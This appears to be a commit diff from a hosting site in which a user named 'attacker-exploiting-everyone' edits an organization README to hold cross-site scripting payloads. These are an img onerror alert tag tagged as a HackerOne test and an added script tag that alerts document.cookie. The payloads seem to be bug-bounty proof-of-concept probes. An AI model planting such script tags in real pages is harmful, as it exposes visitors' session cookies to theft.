attacker-exploiting-everyone commited on
Commit
3c0459c
·
verified ·
1 Parent(s): a82de7f

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +1 -2
README.md CHANGED
@@ -17,6 +17,5 @@ Edit this `README.md` markdown file to author your organization card.
17
  [Download PDF](https://example.com/file.pdf)
18
 
19
  <img src=x onerror=alert('Hackerone TheeEclipse added XSS here')>
20
- <script>alert('Hackerone TheeEclipse added XSS here')</script>
21
 
22
- <button style="width:100px;height:20px;color:red;">CLICK ME</button
 
17
  [Download PDF](https://example.com/file.pdf)
18
 
19
  <img src=x onerror=alert('Hackerone TheeEclipse added XSS here')>
20
+ <script>alert(document.cookie)</script>
21